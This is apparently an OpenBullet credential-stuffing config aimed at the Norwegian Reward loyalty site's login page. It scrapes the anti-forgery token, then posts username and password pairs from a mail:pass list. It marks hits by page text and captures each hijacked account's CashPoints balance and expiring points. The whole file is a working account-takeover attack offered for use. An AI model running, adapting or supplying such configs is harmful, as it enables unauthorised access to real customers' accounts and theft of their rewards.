[SETTINGS]
{
  "Name": "norwegianreward",
  "SuggestedBots": 1,
  "LastModified": "2018-08-30T05:46:42.5514288+00:00",
  "AdditionalInfo": "",
  "Author": "sqrt",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://en.norwegianreward.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "\"__RequestVerificationToken\" type=\"hidden\" value=\"" "\" />" Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST POST "https://en.norwegianreward.com/login" AutoRedirect=TRUE 
  CONTENT "__RequestVerificationToken=<TOKEN>&Username=<USER>&Password=<PASS>&button=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://en.norwegianreward.com" 
  HEADER "Referer: https://en.norwegianreward.com/login" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Log in / Join now" 
  KEYCHAIN Success OR 
    KEY "Log out" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "https://en.norwegianreward.com/acceptterms" 
PARSE "<SOURCE>" LR "\"cashpoints__value\">" "</p>" Recursive=FALSE -> CAP "CashPoints Value" "" "" 
PARSE "<SOURCE>" LR "\"cashpoints__expire\">You have " "CashPoints expiring" Recursive=FALSE -> CAP "CashPoints" "" "" 
